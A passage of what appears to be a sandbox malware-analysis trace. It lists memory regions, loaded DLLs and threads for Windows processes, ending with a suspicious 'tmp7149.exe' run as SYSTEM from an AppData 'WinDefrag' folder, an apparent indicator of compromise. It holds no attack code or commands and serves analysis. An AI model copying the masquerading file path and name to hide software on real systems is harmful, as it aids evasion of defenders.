0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5007 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5008 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5009 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5010 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5011 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5012 start_va = 0x7feff2f0000 end_va = 0x7feff4c6fff entry_point = 0x7feff2f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 5013 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5014 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5015 start_va = 0x7feff640000 end_va = 0x7feff6b0fff entry_point = 0x7feff640000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5016 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5017 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5018 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5019 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5020 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5021 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5022 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5023 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 5024 start_va = 0x7fffff70000 end_va = 0x7fffff71fff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 5025 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 5026 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 5027 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 5028 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 5029 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 5030 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 5031 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 5032 start_va = 0x7fffff80000 end_va = 0x7fffff81fff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 5033 start_va = 0x7fffff82000 end_va = 0x7fffff83fff entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 5034 start_va = 0x7fffff84000 end_va = 0x7fffff85fff entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 5035 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 5036 start_va = 0x7fffff88000 end_va = 0x7fffff89fff entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 5037 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 5038 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 5039 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 5040 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 5041 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 5042 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 5043 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 5044 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 5045 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 5046 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 5047 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 5048 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 5049 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 5050 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 5051 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 5052 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 5053 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 5054 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 5055 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5056 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 5057 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 5058 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 5059 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 5060 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 5061 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5062 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 305 os_tid = 0x278 Thread: id = 306 os_tid = 0x5ec Thread: id = 307 os_tid = 0x1e0 Thread: id = 308 os_tid = 0x698 Thread: id = 309 os_tid = 0x8c8 Thread: id = 310 os_tid = 0x89c Thread: id = 311 os_tid = 0x8ac Thread: id = 312 os_tid = 0x584 Thread: id = 313 os_tid = 0x854 Thread: id = 314 os_tid = 0x880 Thread: id = 315 os_tid = 0x88c Thread: id = 316 os_tid = 0x814 Thread: id = 317 os_tid = 0x69c Thread: id = 318 os_tid = 0x144 Thread: id = 319 os_tid = 0x598 Thread: id = 320 os_tid = 0x930 Thread: id = 321 os_tid = 0x7fc Thread: id = 322 os_tid = 0x874 Thread: id = 323 os_tid = 0xbd8 Thread: id = 324 os_tid = 0xbcc Thread: id = 325 os_tid = 0xa50 Thread: id = 326 os_tid = 0xa44 Thread: id = 327 os_tid = 0x94c Thread: id = 328 os_tid = 0x57c Thread: id = 329 os_tid = 0x5cc Thread: id = 330 os_tid = 0x618 Thread: id = 331 os_tid = 0x614 Thread: id = 332 os_tid = 0x610 Thread: id = 333 os_tid = 0x5d4 Thread: id = 334 os_tid = 0x448 Thread: id = 335 os_tid = 0x438 Thread: id = 336 os_tid = 0x3bc Thread: id = 337 os_tid = 0x3b4 Thread: id = 338 os_tid = 0x3a4 Thread: id = 339 os_tid = 0x304 Thread: id = 340 os_tid = 0x300 Thread: id = 341 os_tid = 0x2d8 Thread: id = 342 os_tid = 0x2d0 Thread: id = 366 os_tid = 0x358 Thread: id = 375 os_tid = 0x9a0 Thread: id = 376 os_tid = 0x564 Thread: id = 377 os_tid = 0x950 Process: id = "36" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x1f2da000" os_pid = "0xac4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d435" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5086 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5087 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5088 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5089 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5090 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5091 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5092 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 5093 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 5094 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 5095 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5096 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5097 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 5098 start_va = 0x380000 end_va = 0x43ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 5099 start_va = 0x440000 end_va = 0x440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 5100 start_va = 0x450000 end_va = 0x450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 5101 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5102 start_va = 0x470000 end_va = 0x5f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 5103 start_va = 0x600000 end_va = 0x780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 5104 start_va = 0x7e0000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 5105 start_va = 0x860000 end_va = 0x95ffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 5106 start_va = 0x960000 end_va = 0xc2efff entry_point = 0x960000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5107 start_va = 0xc30000 end_va = 0x1022fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 5108 start_va = 0x1090000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 5109 start_va = 0x1190000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 5110 start_va = 0x1280000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 5111 start_va = 0x1310000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 5112 start_va = 0x1500000 end_va = 0x157ffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 5113 start_va = 0x1650000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 5114 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5115 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5116 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5117 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5118 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5119 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5120 start_va = 0xff5e0000 end_va = 0xff63efff entry_point = 0xff5e0000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 5121 start_va = 0x7fef5ba0000 end_va = 0x7fef5bb5fff entry_point = 0x7fef5ba0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 5122 start_va = 0x7fef5e10000 end_va = 0x7fef5e23fff entry_point = 0x7fef5e10000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 5123 start_va = 0x7fef6370000 end_va = 0x7fef6396fff entry_point = 0x7fef6370000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5124 start_va = 0x7fef63a0000 end_va = 0x7fef6481fff entry_point = 0x7fef63a0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 5125 start_va = 0x7fefbb00000 end_va = 0x7fefbb2cfff entry_point = 0x7fefbb00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 5126 start_va = 0x7fefbcd0000 end_va = 0x7fefbd55fff entry_point = 0x7fefbcd0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 5127 start_va = 0x7fefbf00000 end_va = 0x7fefbf0efff entry_point = 0x7fefbf00000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 5128 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5129 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5130 start_va = 0x7fefda80000 end_va = 0x7fefda8efff entry_point = 0x7fefda80000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5131 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 5132 start_va = 0x7fefdd60000 end_va = 0x7fefddcafff entry_point = 0x7fefdd60000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5133 start_va = 0x7fefdf60000 end_va = 0x7fefdfc6fff entry_point = 0x7fefdf60000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5134 start_va = 0x7fefed60000 end_va = 0x7fefed8dfff entry_point = 0x7fefed60000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5135 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5136 start_va = 0x7feff0e0000 end_va = 0x7feff1bafff entry_point = 0x7feff0e0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5137 start_va = 0x7feff1c0000 end_va = 0x7feff1defff entry_point = 0x7feff1c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5138 start_va = 0x7feff1e0000 end_va = 0x7feff2e8fff entry_point = 0x7feff1e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5139 start_va = 0x7feff4d0000 end_va = 0x7feff598fff entry_point = 0x7feff4d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5140 start_va = 0x7feff5a0000 end_va = 0x7feff63efff entry_point = 0x7feff5a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5141 start_va = 0x7feff860000 end_va = 0x7feff86dfff entry_point = 0x7feff860000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5142 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5143 start_va = 0x7feffa40000 end_va = 0x7feffc42fff entry_point = 0x7feffa40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5144 start_va = 0x7feffc50000 end_va = 0x7feffd7cfff entry_point = 0x7feffc50000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5145 start_va = 0x7feffd80000 end_va = 0x7feffe56fff entry_point = 0x7feffd80000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5146 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 5147 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5148 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5149 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 5150 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 5151 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5152 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 5153 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 5154 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 5155 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 5156 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 5157 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5158 start_va = 0x7fef5d00000 end_va = 0x7fef5d25fff entry_point = 0x7fef5d00000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 5159 start_va = 0x7fef9230000 end_va = 0x7fef926bfff entry_point = 0x7fef9230000 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Thread: id = 349 os_tid = 0xbc4 Thread: id = 350 os_tid = 0x828 Thread: id = 351 os_tid = 0xbac Thread: id = 352 os_tid = 0xba0 Thread: id = 353 os_tid = 0x4b4 Thread: id = 354 os_tid = 0xb60 Thread: id = 355 os_tid = 0x99c Thread: id = 356 os_tid = 0x9a8 Process: id = "37" image_name = "tmp7149.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe" page_root = "0x26f39000" os_pid = "0x534" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0xa58" cmd_line = "C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe " cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d435" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5169 start_va = 0x10000 end_va = 0x2ffff entry_point = 